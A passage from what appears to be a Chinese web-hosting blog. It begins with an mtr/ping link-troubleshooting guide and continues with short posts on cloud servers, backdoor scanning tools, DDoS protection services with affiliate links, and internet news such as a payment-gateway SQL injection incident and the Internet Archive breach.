如果在某一跳之后延迟明显陡增,则通常判断该节点存在网络异常。如上图所示,从第5跳之后的后续节点延迟明显陡增,则推断是第5跳节点出现了网络异常。不过,高延迟并不一定完全意味着相应节点存在异常。如上图所示,第5跳之后,虽然后续节点延迟明显陡增,但测试数据最终仍然正常到达了目的主机。所以,延迟大也有可能是在数据回包链路中引发的。所以,最好结合反向链路测试一并分析。   场景二:ICMP限速导致延迟增加 ICMP策略限速也可能会导致相应节点的延迟陡增,但后续节点通常会恢复正常。如上图所示,第3跳有100%的丢包率,同时延迟也明显陡增。但随后节点的延迟马上恢复了正常。所以判断该节点的延迟陡增及丢包是由于策略限速所致。   常见的链路异常场景 常见的链路异常场景及测试报告如下。   场景一:目标主机网络配置不当 示例数据如下。 [root@mycentos6 ~]# mtr —no-dns www.google.com My traceroute [v0.75] mycentos6.6 (0.0.0.0) Wed Jun 15 19:06:29 2016 Keys: Help Display mode Packets Pings Host Loss% Snt Last Avg Best Wrst StDev 1. ??? 2. ??? 3. 1XX.X.X.X 0.0% 10 521.3 90.1 2.7 521.3 211.3 4. 11X.X.X.X 0.0% 10 2.9 4.7 1.6 10.6 3.9 5. 2X.X.X.X 80.0% 10 3.0 3.0 3.0 3.0 0.0 6. 2X.XX.XX.XX 0.0% 10 1.7 7.2 1.6 34.9 13.6 7. 1XX.1XX.XX.X 0.0% 10 5.2 5.2 5.1 5.2 0.0 8. 2XX.XX.XX.XX 0.0% 10 5.3 5.2 5.1 5.3 0.1 9. 173.194.200.105 100.0% 10 0.0 0.0 0.0 0.0 0.0 在该示例中,数据包在目标地址出现了100%的丢包。从数据上看是数据包没有到达,其实很有可能是目标服务器相关安全策略(比如防火墙、iptables 等)禁用了ICMP所致,导致目的主机无法发送任何应答。所以,该场景需要排查目标服务器的安全策略配置。   场景二:ICMP限速 示例数据如下。 [root@mycentos6 ~]# mtr --no-dns www.google.com My traceroute [v0.75] mycentos6.6 (0.0.0.0) Wed Jun 15 19:06:29 2016 Keys: Help Display mode Packets Pings Host Loss% Snt Last Avg Best Wrst StDev 1. 63.247.X.X 0.0% 10 0.3 0.6 0.3 1.2 0.3 2. 63.247.X.XX 0.0% 10 0.4 1.0 0.4 6.1 1.8 3. 209.51.130.213 0.0% 10 0.8 2.7 0.8 19.0 5.7 4. aix.pr1.atl.google.com 0.0% 10 6.7 6.8 6.7 6.9 0.1 5. 72.14.233.56 60.0% 10 27.2 25.3 23.1 26.4 2.9 6. 209.85.254.247 0.0% 10 39.1 39.4 39.1 39.7 0.2 7. 64.233.174.46 0.0% 10 39.6 40.4 39.4 46.9 2.3 8. gw-in-f147.1e100.net 0.0% 10 39.6 40.5 39.5 46.7 2.2 在该示例中,在第5跳出现了明显的丢包,但后续节点均未见异常。所以推断是该节点ICMP限速所致。该场景对最终客户端到目标服务器的数据传输不会有影响,所以,分析的时候可以忽略。   场景三:环路 示例数据如下。 [root@mycentos6 ~]# mtr —no-dns www.google.com My traceroute [v0.75] mycentos6.6 (0.0.0.0) Wed Jun 15 19:06:29 2016 Keys: Help Display mode Packets Pings Host Loss% Snt Last Avg Best Wrst StDev 1. 63.247.7X.X 0.0% 10 0.3 0.6 0.3 1.2 0.3 2. 63.247.6X.X 0.0% 10 0.4 1.0 0.4 6.1 1.8 3. 209.51.130.213 0.0% 10 0.8 2.7 0.8 19.0 5.7 4. aix.pr1.atl.google.com 0.0% 10 6.7 6.8 6.7 6.9 0.1 5. 72.14.233.56 0.0% 10 0.0 0.0 0.0 0.0 0.0 6. 72.14.233.57 0.0% 10 0.0 0.0 0.0 0.0 0.0 7. 72.14.233.56 0.0% 10 0.0 0.0 0.0 0.0 0.0 8. 72.14.233.57 0.0% 10 0.0 0.0 0.0 0.0 0.0 9 ??? 0.0% 10 0.0 0.0 0.0 0.0 0.0 在该示例中,数据包在第5跳之后出现了循环跳转,导致最终无法到达目标服务器。这通常是由于运营商相关节点路由配置异常所致。所以,该场景需要联系相应节点归属运营商处理。   场景四:链路中断 示例数据如下。 [root@mycentos6 ~]# mtr —no-dns www.google.com My traceroute [v0.75] mycentos6.6 (0.0.0.0) Wed Jun 15 19:06:29 2016 Keys: Help Display mode Packets Pings Host Loss% Snt Last Avg Best Wrst StDev 1. 63.247.7X.X 0.0% 10 0.3 0.6 0.3 1.2 0.3 2. 63.247.6X.X 0.0% 10 0.4 1.0 0.4 6.1 1.8 3. 209.51.130.213 0.0% 10 0.8 2.7 0.8 19.0 5.7 4. aix.pr1.atl.google.com 0.0% 10 6.7 6.8 6.7 6.9 0.1 5. ??? 0.0% 10 0.0 0.0 0.0 0.0 0.0 6. ??? 0.0% 10 0.0 0.0 0.0 0.0 0.0 7. ??? 0.0% 10 0.0 0.0 0.0 0.0 0.0 8. ??? 0.0% 10 0.0 0.0 0.0 0.0 0.0 9 ??? 0.0% 10 0.0 0.0 0.0 0.0 0.0 在该示例中,数据包在第4跳之后就无法收到任何反馈。这通常是由于相应节点中断所致。建议结合反向链路测试做进一步确认。该场景需要联系相应节点归属运营商处理。   链路测试步骤 通常情况下,链路测试步骤如下图所示。 相关步骤的详情说明如下。   步骤一:获取本地网络对应的公网IP 在客户端本地网络内访问如下链接,获取本地网络对应的公网IP地址。 http://ip.taobao.com/ 系统显示类似如下。   步骤二:正向链路测试(ping和mtr) 从客户端向目标服务器做如下测试。 从客户端向目标服务器域名或IP做持续的ping测试,建议至少ping 100个数据包,记录测试结果。 根据客户端操作系统的不同,使用WinMTR或mtr,设置测试目的地址为目标服务器域名或IP,然后进行链路测试,记录测试结果。   步骤三:反向链路测试(ping和mtr) 进入目标服务器系统内部做如下测试。 从目标服务器向步骤一获取的客户端IP做持续的ping测试,建议至少ping 100个数据包,记录测试结果。 根据目标服务器操作系统的不同,使用WinMTR或mtr,设置测试目的地址为客户端的IP地址,然后进行链路测试,记录测试结果。   步骤四:测试结果分析 参阅测试结果的简要分析,对测试结果进行分析。确认异常节点后,访问如下链接或其他可以查询IP归属地的网站,获取该异常节点的归属运营商信息。如果是客户端本地网络相关节点出现异常,则需要对本地网络进行相应排查分析。如果是运营商相关节点出现异常,则需要向运营商反馈问题。 http://ip.taobao.com/ 查询结果类似如下。 本文来源:阿里云 #### 云服务器和虚拟主机有什么区别? 云服务器与虚拟主机的区别 技术原理 云服务器和虚拟主机是两种不同的网络服务,它们的技术原理决定了其各自的特性。 虚拟主机是指在单一物理服务器上,通过虚拟化技术划分出来的多个虚拟服务器空间。虚拟主机共享该物理服务器的资源,如CPU、内存和存储空间,但每个虚拟主机拥有自己的操作系统和系统资源。 云服务器则是一组集群主机上虚拟出的多个类似独立主机的部分。云服务器具备弹性可伸缩、高可用性和可扩展性,它可以在需要时动态增加或减少硬件资源以适应访问量的变化。 可用资源 云服务器通常提供的是独享资源,即用户可以享受到独立的CPU、内存、硬盘和IP等,而虚拟主机则是多个网站空间共享一台物理服务器的资源。 主机费用 虚拟主机因为共享资源,通常费用较低,而云服务器因为提供独立资源且具备高级功能,费用相对较高。 环境部署 云服务器需要用户手动配置环境,而虚拟主机通常不需要,因为虚拟主机环境是商家配置好的。 服务器管理 云服务器支持远程桌面登录进行管理,而虚拟主机一般只能通过FTP或控制面板进行管理。 性能与安全性 虚拟主机的性能可能会因为与其他虚拟主机共享资源而受到影响,而云服务器则根据需要分配资源,提供更高的性能。在安全性方面,云服务器通常提供更高的安全措施,例如数据加密和多重防护措施,而虚拟主机则相对较少。 应用场景 虚拟主机适合小型个人网站或中小企业的官方网站,而云服务器则适用于大型企业、高流量网站和复杂的在线应用开发。 灵活性与扩展性 云服务器具有更大的灵活性和可扩展性,可以在几分钟内完成部署,且可以轻松地进行规模扩张。虚拟主机则在扩展性和灵活性上有所限制。 综上所述,云服务器与虚拟主机在技术原理、可用资源、费用、环境部署、管理方式、性能与安全性、应用场景、灵活性与扩展性等多个方面存在显著差异。用户在选择时应根据自己的需求、预算和使用场景来决定最合适的服务类型。 #### 云服务器大降价 亚马逊云计算价格砍掉一半 云计算时代的到来,使得个人或者企业免去了购买服务器、带宽,建设网络机房的麻烦,几乎所有的资源都可以通过网络来租用。据外媒最新消息,作为云计算市场的霸主,亚马逊公司日前对旗下云计算部门的服务器产品进行了几乎一半的大规模降价。需要指出的是,云计算是一个覆盖范围相当广泛的产业,包括了网络存储、服务器计算资源租赁、商用软件包月使用、数据库、应用开发接口租用(比如租用专业公司提供的图像识别、视频识别功能)等内容。云计算市场的出现,大大降低了互联网行业创业者的成本,他们可以快速开发APP,利用云计算公司的资源在全球范围内提供服务,公司也实现了轻资产运作。据美国科技媒体报道, 2016 年,亚马逊云计算部门(对外使用AWS品牌)面对Digital Ocean、OVH等行业对手,推出了入门级虚拟服务器服务Lightsail。所谓的虚拟服务器,即用户通过CPU和内存的租赁,相当于在网络上拥有了一台自己随意控制的服务器。日前,亚马逊宣布将推出更丰富的虚拟服务器产品,同时将Linux产品的价格降低一半。Windows虚拟服务器的产品也进行了降价,但是降幅在三成左右。比如1GB内存的Linux虚拟服务器,过去的价格是每月 10 美元,如今降低到了 5 美元,8GB内存的服务器,包月费则从 80 美元降到了 40 美元。亚马逊此次增加了Linux虚拟服务器的两种产品,内存分别是16GB和32GB,包月费分别是 80 美元和 160 美元。不过,价格最便宜的产品(内存为512MB),价格从 5 美元降低到了3. 5 美元,并未达到一半。每一个虚拟服务器都有专用的固态硬盘,固定的IP地址(提供网络服务的基础),另外也包括其他虚拟服务器的常规服务。众所周知的是,Linux是开源操作系统,厂商免费使用,而微软的Windows则是付费使用的商用软件,因此Windows虚拟服务器的价格高于Linux。512MB内存的Windows虚拟服务器,最新价格降为每月 8 美元,使用人数更多的1GB服务器,则每月需支付 12 美元。在过去几年中,谷歌、亚马逊、苹果、IBM、Box、微软、阿里巴巴等公司在云计算市场展开激烈争夺,而随着硬件成本的下降,每隔一段时间,云计算市场将会展开一场大规模降价,降幅达到两三成甚至一半。大幅度的降价,使得云计算市场快速升温。越来越多的企业已经放弃了古老的IT运营思维,即购买服务器、购买商用软件、建设机房等。也是在八月份,谷歌也对旗下云计算的云存储业务进行了一次大降价,谷歌对个人云存储推出了“Google One”的全新品牌,比如过去用户每月支付 10 美元,可以获得1TB空间(1024GB),降价之后可以获得2TB空间。亚马逊财报显示,今年二季度,云计算部门获得了 61 亿美元的总收入,同比增长四成,而在所有运营利润中,云计算贡献了一半。据报道,在过去多年中,亚马逊在云计算市场一直是优势相当明显的老大,一些业务指标甚至相当于所有竞争对手的总和。不过,竞争对手快速追赶,迫使亚马逊不得不通过降价提高竞争力。 #### 云服务器如何快速查找、筛选疑似挂马、后门文件 本教程仅实用于服务器上批量扫描后门、被挂马文件。注意根据扫描结果需人工分析和判断,然后再清理挂马,删除文件需谨慎!!! Linux云服务器: 1. Ssh远程登录服务器,下载http://download.myhostadmin.net/FileScan/hm-linux-amd64.tgz ,并解压。 2. 执行命令:./hm update 更新病毒库。 3./hm scan /home/wwwroot/ #(/home/wwwroot/ 是站点总目录)。 4. 扫描完成之后结果会保存为result.csv文件,将这个文件下载到本地使用EditPlus打开查看结果。 5. 前提是服务器网络无问题,如果服务器处于断网状态下无法扫描。 Windows云服务器: 1. 先远程到服务器上下载http://download.myhostadmin.net/FileScan/HwsKill.rar 并解压。 2. 打开护卫神,选择自定义查杀(站点目录一般是d:\wwwroot\这个目录)。 3. 根据扫描结果进行分析并清理后门文件。 4. 一般我们虚拟主机清理后门也可以使用该工具,选择远程查杀可以设置ftp。 注意:以上方式是快速查找、筛查疑似挂马、后门文件,必须人工再分析、审核文件。根据实际情况清理挂马等处理,删除文件一定要谨慎!!! #### 云服务器如何防护DDOS/CC攻击 现在很多网站都是用使用云服务器搭建的,云服务器相当以前虚拟主机、独立服务器优势在于资源可以独享,操作又方便,完全集成了前两者的特点。但云服务器其实防护能力非常低,比如腾讯云只防护2G的DDOS攻击,而阿里云只防护5G DDOS攻击,而对CC防护是没有的。今天主机吧来教大家云服务器如何防护DDOS攻击。 一、直接选择提供高防云服务器服务商 云服务器不能像独立服务器那样托管于高防机房,安装硬件防火墙来防护,所以我们可以选择本来就提供高防服务的服务商,阿里云腾讯云那种就是普通云服务器,而像西部数码、群英网络都有提供高防云服务器,可以有效防护DDOS/CC攻击。 二、购买原云服务商的高防服务 像阿里云这种云服务器商都有应对DDOS攻击的服务,比如购买高防IP、购买SCDN,都是阿里云推出的高防服务,但是价格要远高于购买第三方服务商的防护服务,所以可以钱不多的,不建议使用阿里云,毕竟云服务器防护是长期的,你可以购买一个月,过一个月后对方再攻击你怎么办?一样再买一个月?这钱花出去就跟个无底洞似的,真要购买阿里云的高防服务一直下来没十几万防不住。 三、购买第三方高防IP 这里说的第三方高防IP并不是指直接在原服务商购买,像阿里云、腾讯云购买的高防IP是很贵的,一个月就67千,而这类高防IP其实国内很多家公司都在做,一个月千把块左右的高防IP很多公司可以买,高防IP是可以直接转发源服务器的IP资源,可以对源服务器的IP进行隐藏并防护攻击,对方不知道你的原服务器IP自然也没办法DDOS你,只能DDOS你的高防IP,达到防御效果。 这种做法需要对原来的IP进行更换了,而且对外一定不能暴露出源服务器IP,不过是域名解析还是APP访问都必须通过高防IP,一但对方知道你源IP防护效果就没用了。 四、购买第三方高防CDN CDN也就是内容分发,这类高防局限性很大,主要适用于采用域名访问的业务,是通过防护域名隐藏源站IP来达到防护DDOS/CC效果。国内这类的业务的比较出来的是百度云加速、网站卫士、加速乐,阿里云腾讯云也有提供类似的CDN叫安全加速SCDN,不过价格比较贵,这里我们说下百度云加速、网站卫士、加速乐,这三家都是免费防护起家,前期通过免费来吸引客户,慢慢的推出收费服务。而加速乐网站卫士收费都比较贵,百度云加速的就非常便宜,而且对CC类的防护效果非常好,主机吧推荐大家如果购买高防CDN的可以在主机吧这边购买,价格更便宜。 #### 云服务器机房是地域重要还是线路重要? 我们在购买云服务器的时候,会看是不是BGP多线,还是电信联通移动单线,还是看服务器所在机房的地域呢? 今天主机吧就来谈谈在选服务器的时候是看机房地址还是看机房线路。 我们先来看一组测试案例: 主机吧一客户网站主要在河北潍坊,同时主要是移动网络访问,这里主机吧给他推荐了一个山东济南联通机房的线路,一个浙江宁波BGP多线机房的线路。 110.42.6.254 华东BGP 华北联通 123.129.204.1 测试结果得出离潍坊更近的山东济南联通访问速度更快,而有移动线路的浙江宁波BGP多线机房速度慢些。从这个结果我们得出,机房地域比线路更重要,机房离客户越近,访问速度越快,哪怕跨线路也是比更远机房快。 所以我们在选择云服务器的时候: 如果你在做某一特定地域的客户的,那么要优先考虑选离这个地域近的机房服务器,如果你是做全国的,建议你选客户多的地域机房,或者使用CDN,CDN可以边缘加速全国各地访问。 #### 云服务器被DDOS如何紧急处理? 如果你使用的是云服务器,处理DDoS攻击也有一些特殊的考虑因素,以下是一些处理DDoS攻击的方法: 开启云防火墙:云防火墙是一种防御DDoS攻击的有效方式。云防火墙可以对流量进行实时监控,并根据你设置的规则对流量进行过滤和限制。你可以使用云防火墙来限制访问源和端口等信息,以减少DDoS攻击带来的影响。 使用云CDN:云CDN可以将网站的静态资源分发到全球的CDN节点上,并通过智能路由技术将访问请求引导到最近的CDN节点上。这样可以减少DDoS攻击流量的压力,同时提高网站的访问速度和稳定性。 选择DDoS防护服务:如果你需要更高级别的DDoS防御技术和支持,你可以选择使用云厂商提供的DDoS防护服务。这些服务通常包括云防火墙、DDoS防护设备、全球清洗中心等,可以提供全面的DDoS攻击防御和应急响应服务。 定期备份数据:云服务器也需要定期备份数据和系统。你可以将备份数据存储在云端或其他安全的地方,以避免攻击者破坏你的备份数据。同时,你也需要确保你的备份数据和系统能够在云环境下顺利恢复。 加强安全意识:在使用云服务器时,你也需要加强安全意识和安全防范。你需要确保你的云服务器设置合理的访问控制、账户管理和权限管理,并及时更新安全补丁和软件版本。你也需要定期进行安全检查和漏洞扫描,以及加强员工的安全培训和意识教育。 总之,使用云服务器也需要注意DDoS攻击的风险。你需要采取合适的措施来保护你的云服务器和网站不受攻击。与此同时,你也需要加强安全意识和安全防范,提高对网络安全的重视程度。 主机吧推荐使用云防火墙来进行防御DDOS攻击: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### 云盾网站访问出现Blocked by CC firewall原因分析 最近有客户使用了云盾的抗D CDN和百度云加速结合一起用,然后反馈这边有客户访问经常出现:Blocked by CC firewall 经过主机吧测试原因是云盾的拦截系统误拦截了用户IP,把正常访问用户当成是攻击IP了。所以就出现了以上情况。 理论上云盾跟百度云加速结合一起用可以提升防护能力的,但其实云盾的误杀率是非常高的,就主机吧自己访问云盾官网都遇到Blocked by CC firewall,更别说别人。 所以主机吧不建议使用云盾,而百度云加速具有拦截能力强,误杀率低的特点,价格也非常低,非常适合各大网站使用。 #### 互联网314安全大事件:聚合支付0day漏洞造成百万损失 近日,一起严重的网络安全事件引起了广泛关注。在一个程序员售后群中,有人分享了一张关于“易支付 SQL注入测试”的截图。截图显示,某个网站使用的支付接口被SQL注入攻击,导致订单回调被篡改,从而使支付成功。 在这起事件中,受害最严重的是一些卡盟和卡商平台。由于这些平台通常是代理的总平台,里面预充了大量资金,因此在支付回调被篡改后,羊毛党可以随意购买那些自动到账的会员。据受害者透露,有的被撸了几千,有的被撸了几万。面对这一问题,程序开发者建议暂时关闭受影响的网站,等待解决SQL注入问题后再使用新版本重新开放。 据粗略估计,此次事件波及的网站众多,损失金额至少超过百万。这一事件再次提醒了广大站长和开发者,网络安全不容忽视,应时刻保持警惕,及时更新和升级系统,以防止类似事件的发生。 推荐使用百度云防护进行网站防护,百度云防护是百度旗下智能云提供的一种安全加速服务,通过智能DNS解析和动静态内容缓存技术,帮助用户提升业务的访问速度和用户体验。百度云防护集成了WAF、DDoS、CC防护能力,解决SQL 注入、XSS 跨站、Webshell 上传、非授权访问等多种 Web 服务攻击防护,有效解决 SYN Flood/ACK Flood/ICMP Flood/UDP Flood 等多种网络层 DDoS 攻击,以及 CC 攻击等应用层攻击,具备最高 T 级的 DDoS 防护能力。 优惠链接:https://zhujib.com/yunjiasu.html #### 互联网举报受理平台12339正式开通 日前,互联网举报受理平台正式开通上线了,个人和组织可面向平台做出一些情况线索的举报,网络的透明化和便捷性将带来效率的极大提高! 新华社消息:从2018年4月15日起,国家安全部开通互联网举报受理平台网站www.12339.gov.cn,接受组织和个人的举报信息。 任何组织和个人可通过登录该网站,对发现的危害国家安全犯罪行为、间谍行为和其他危害国家安全行为的情况线索进行举报。也是为了加强对线索实时提供举报受理工作方面的举措。 此外,国家安全机关将依法受理举报信息并对有关组织和个人依法举报的行为予以保密。对举报属实、有特殊贡献的将予以奖励;虚假举报、妨碍工作等情形将依法追究其法律责任。 #### 互联网信息服务投诉平台上线 涵盖百度阿里腾讯等11家企业 4月9日 消息:据北京青年报报道,昨日,中国互联网协会建成互联网信息服务投诉平台上线运行,网友可在线进行互联网信息服务相关投诉。目前涵盖包括阿里巴巴、百度、滴滴、今日头条、京东、美团、腾讯、唯品会、携程、新浪、支付宝等 11 家企业。 用户可登录互联网信息服务投诉平台,点击“我要投诉”,按要求填写信息,据实提交有关投诉。投诉提交成功后,被投诉企业将在 10 个工作日内完成处理,并告知用户处理结果。广大用户可通过互联网信息服务投诉平台进行投诉。投诉网址:ts.isc.org.cn。 据了解,目前平台主要接收互联网信息服务相关问题的投诉,包括个人信息保护、服务功能、企业投诉机制三类。投诉平台接收用户的投诉信息后,直接转发给被投诉企业,由被投诉企业直接处理用户的投诉。平台提示,涉及网络交易纠纷、网购假冒伪劣产品、虚假广告、欺诈性商业行为、金融产品和服务的财产安全、版权等问题的投诉,请您向12315、12318、 12363 等其他平台投诉。 著作权归作者所有。 商业转载请联系作者获得授权,非商业转载请注明出处。 作者:站长之家编辑 链接:https://www.chinaz.com/sees/2019/0409/1007356.shtml 来源:站长之家 #### 互联网免费终结!电子书下载网站readfree宣布关停 7月5日,知名电子书资源网站readfree宣布正式关停,在版权管理收紧的当下,免费电子书资源网站又少了一家。 readfree方面表示,诞生以来,readfree一直承受着极大的风险和压力,在夹缝中艰难求存。随着国内版权政策日趋规范,再负隅顽抗下去,无异于螳臂当车,自取祸端。“为爱读书的人提供便利”,这是readfree最初建站的愿景,也是我们坚持至今最大的动力。在它生命结束的时候,我们可以自豪的宣称,它已经实现了最初的愿景,并且远远超出了预期。现在是它退出历史舞台的时候。 据了解,readfree是免费电子书推送下载网,是一个基于豆瓣和亚马逊Kindle的电子书籍推送网站,该网站上的所有书籍格式多为mobi格式,适合于kindle阅读,在这里你可以找到海量的电子书籍。 以下是“readfree告别辞” 尽管十分无奈和不舍,但这一天终究还是来了: readfree到了跟大家说再见的时候。 做出这个决定的原因,相信大家也能猜到。诞生以来,readfree一直承受着极大的风险和压力,在夹缝中艰难求存。随着国内版权政策日趋规范,再负隅顽抗下去,无异于螳臂当车,自取祸端。 “为爱读书的人提供便利”,这是readfree最初建站的愿景,也是我们坚持至今最大的动力。在它生命结束的时候,我们可以自豪的宣称,它已经实现了最初的愿景,并且远远超出了预期。现在是它退出历史舞台的时候。 如果你尚有未使用的额度,只能说一声抱歉。网站在充值页面早有说明,我们不会对此提供赔偿,期望得到你的理解。事实上网站提供的额度是远超合理的数字,你只要使用其中很少一部分,就没有损失。至于花高价购买邀请码和账号的书友,只能说以后避免冲动消费。 readfree会以其它的方式归来吗?可能会,也可能不会。如果某一天出现了更适合它的生存方式,我们会通过微博@readfree宣布,期望你能关注它。即使readfree最后没有归来,也是一种纪念。 有任何问题,都可以通过微博@readfree私信联系。 最后,感谢各位书友多年来的陪伴和鼓励,愿大家各自珍重。 admin@readfree.me 2019.07.05 #### 互联网协管组织 ICANN 拒绝断开俄罗斯互联网连接 本周一,乌克兰官员请求互联网协管组织 ICANN 以及欧洲网络协调中心(RIPE NCC)撤消域名“.ru”、“.рф”和“.su”,他们还要求关闭莫斯科和圣彼得堡的根服务器。 不过周四的时候ICANN 向乌克兰作出回应,拒绝了这一请求,并表示该操作不在 ICANN 的使命范围内。 ICANN 首席执行官 Goran Marby 表示:“如你所知,互联网是一个分散的系统。没有任何一个人有能力控制它或关闭它,我们的使命不会延伸到采取惩罚性行动,发动制裁或限制互联网部分的访问。” ICANN 官网介绍显示,ICANN 作为互联网名称与数字地址分配机构,是一家非营利公益型企业,其社群成员遍布全球各地,致力于确保互联网的安全性、稳定性和互用性。 虽然俄罗斯的互联网暂时不会被切断,但俄乌冲突以来,一些国家的黑客频繁对俄罗斯发动网络攻击,俄罗斯政府已准备启动自己的“大局域网”Runet。 虽然ICANN 表示并不会断开俄罗斯互联网,但是ICANN 确实有这个能力,说明一但打起仗来,出于某种目的,西方那些所谓的公益组织断不断网全凭一张口,非常不安全,咱国内也要积极搞自己的“大局域网”才是,否则一但哪天跟别国冲突了,互联网一但断开,损失将是极其惨重的。 #### 互联网数据中心业务IDC许可证是什么? IDC许可证概述 IDC许可证,全称为“增值电信业务经营许可证-互联网数据中心业务”,是经营IDC业务必须具备的证件。IDC许可证不仅是一个网络概念,还是一个服务概念,它构成了网络基础资源的一部分,提供了一种高端的数据传输服务和高速接入服务。 IDC许可证的作用 IDC许可证为互联网内容提供商(ICP)、企业、媒体和各类网站提供大规模、高质量、安全可靠的专业化服务器托管、空间租用、网络批发带宽以及ASP、EC等业务。IDC许可证不仅是一个互联网定义,还是一个服务概念,它形成了网络基础知识网络资源的一部分,提供了一种高端的数据传输(DataDelivery)的服务和高速接入服务。 IDC许可证的申请条件 申请IDC许可证,需要满足下列条件: IDC许可证经营者为依法设立的公司。 有与开展经营IDC活动相适应的资金和专业人员。 有为用户提供长期IDC许可证服务的信誉或者能力。 在省、自治区、直辖市范围内经营的,注册资本最低限额为100万元人民币;在全国或者跨省、自治区、直辖市范围经营的,注册资本最低限额为1000万元人民币。 有必要的IDC场地、设施及技术方案。 公司及其主要出资者和主要经营管理人员三年内无违反电信监督管理制度的违法记录。 国家规定的其他条件。 IDC许可证的申请流程 申请IDC许可证,需要满足上述条件后,需要向相关部门提供下列申请IDC许可证的材料: 申请IDC公司经会计师事务所审计的企业法人当年财务会计报告或者验资报告及电信管理机构规定的其他相关会计资料。 为用户提供长期服务和质量保障的措施。 申请经营IDC许可证业务的业务发展计划和市场营销计划。 #### 互联网是有国界的,域名服务商Namecheap宣布3月22日前清退俄罗斯客户 俄乌冲突爆发后,许多企业加入了抗议制裁俄罗斯的大军。然而一刀切的政策,无疑误伤了许多普通人。在周一致客户的一封电子邮件中,域名注册与托管服务提供商 Namecheap 写道 —— 该公司将不再为在俄罗斯注册的用户提供服务。由社交媒体上分享的邮件原文可知,受影响的用户最初被要求在 3 月 6 日前转至另一家服务提供商,但后来又推迟到了 3 月 22 日。 其实在俄罗斯发起军事行动后不久,Namecheap 首席执行官 Richard Kirkendall 就已在一条推文中明确表示抵制,并指出乌克兰当地的团队成员受到了俄乌冲突的直接影响。 域名投资网站 DomainInvesting.com 在一篇博客文章中补充道,Namecheap 在乌克兰的业务规模相当大,此前有列出 30 多个在哈尔科夫和利沃夫市的空缺岗位的招聘启事。 然而过去数日,哈尔科夫一直深陷炮火袭扰的泥潭,造成至少 10 位平民丧生和诸多建筑物被毁。 对于 Namecheap 的这一刀切式决定,许多网友在 Twitter 上表达了愤怒,毕竟这影响了许多普通人。 莫斯科记者 Alexey Kovalyov 也是其中一员,政策变动导致其不得不将自 2015 年以来的工作档案搬到新平台进行托管。 在遭到抨击之后,Namecheap 一位发言人告知 TheVerge,该公司已经修订了相关政策,意味着反战媒体网站、脱离了俄罗斯、或任何有助于结束这场冲突的个人都可获得豁免。 这件事,对于国内互联网企业可以说是敲起了警钟,哪天如果我国因为某些原因被西方制裁了,那些域名注册商、软件商等IT企业会不会都跳出来清退我们的产品呢? 想想都是非常可怕的事情。 #### 互联网档案馆遭遇黑客攻击 近日,科技媒体 arstechnica 发布博文,报道称互联网档案馆网站 Archive.org 遭遇黑客攻击,导致大约 3100 万用户数据被泄露。 互联网档案馆(Internet Archive)是一个非营利性的数字图书馆,成立于 1996 年,旨在提供免费、普遍的访问各种数字内容,包括文本、电影、音乐和网站等。 该网站被黑期间,用户访问时会跳出以下弹窗: Archive.org 你是否有预感互联网档案馆如履薄冰,随时可能遭受灾难性的安全漏洞?你的感觉没错,这种感觉现在就变成现实了,3100 万用户数据已托管在 HIBP 上了,其中就有你的账号信息。 HIBP 是 Have I been Pwned 的缩写,是一家权威的泄露通知网站,帮助人们在账户被攻陷后保护他们的账户。 HIBP 表示,攻击发生在上个月,曝光了 3100 万个记录,包含电子邮件地址、用户名和 bcrypt 哈希密码。 互联网档案馆布鲁斯特・凯尔(Brewster Kahle)在社交媒体上表示,档案库遭遇了 DDoS 攻击。 #### 互联网档案馆(Internet Archive)遭遇 DDoS 攻击 近日,互联网档案馆(Internet Archive)发布博文,表示近期频繁遭到分布式拒绝服务(DDoS)攻击,导致其服务多次宕机,用户无法正常访问。 互联网档案馆(Internet Archive)目前已进入抵御间歇性 DDoS(分布式拒绝服务)网络攻击的第三天。图书馆工作人员调查后认为当前馆藏资料是安全的,但服务仍不稳定。互联网档案 Wayback Machine(保存了超过 8660 亿个网页的历史)的访问也受到了影响。 "互联网档案馆"(Internet Archive)的非营利组织维护的网站,目的是建立一个数字图书馆,建立一个数字化的全球互联网图书馆,以保留互联网上的文化遗产,使其能够被后代访问和研究。就像纸质图书馆一样,为研究人员、历史学家、学者、阅读障碍者和公众提供免费访问。使命是提供所有知识的普遍获取。 从 1996 年开始对互联网本身进行归档,当时互联网的使用刚刚开始增长。现在有: 7350 亿个网页 4100 万册书籍和文本 1470万 录音(包括240,000场现场音乐会) 840 万个视频(包括 240 万个电视新闻节目) 440 万张图像 890,000 个软件程序 主要特色是其能够以多个时间点快照的方式保存网页。你可以在不同时间点查看特定网页的旧版本,了解在过去某一时刻该网页的内容和布局。 #### 互联网法院:图片类侵权案占比高 单张最高赔偿5000 站长用图小心啦 4月22日 消息:据澎湃新闻报道,今日北京互联网通报涉网络知识产权司法保护情况。通报指出,图片类著作权侵权案件占著作权案件的一半以上,若被告将侵权图片用作商业用途,单张图片最高可判赔 5000 元。 北京互联网法院综合审判一庭庭长卢正新表示,从诉讼主体看,原告相对集中,主要为专业图片公司,涉案数量排名前五的公司起诉的图片类案件,占全部图片类案件的43%;被告相对广泛,以新闻网站主办单位、微博、微信等自媒体用户为主。 卢正新表示,对于图片本身独创性程度较高、创作难度较大,且被告侵权故意明显,例如将侵权图片用作商业用途等,在此情形下,法院通常采取对权利人强保护的态度,实践中单张图片最高判赔 5000 元。与之相对,倘若图片本身独创性程度较低、创作难度不大,被告过错不明显,例如普通网络用户因版权意识不强,在自媒体转载文章时将小幅图片作为配图使用,遇此类情形,法官会从平衡权利人和侵权人利益的角度出发,合理确定判赔数额,实践中单张图片最低判赔 300 元。 数据显示, 2018 年 9 月 9 日至 2020 年 3 月 31 日,北京互联网法院共受理案件 54844 件,其中知识产权案件 42121 件,占比76.8%。知识产权民事案件中,著作权纠纷案件 42080 件,占比99.9%,网络域名纠纷案件 40 件;另有涉知产行政案件 1 件。 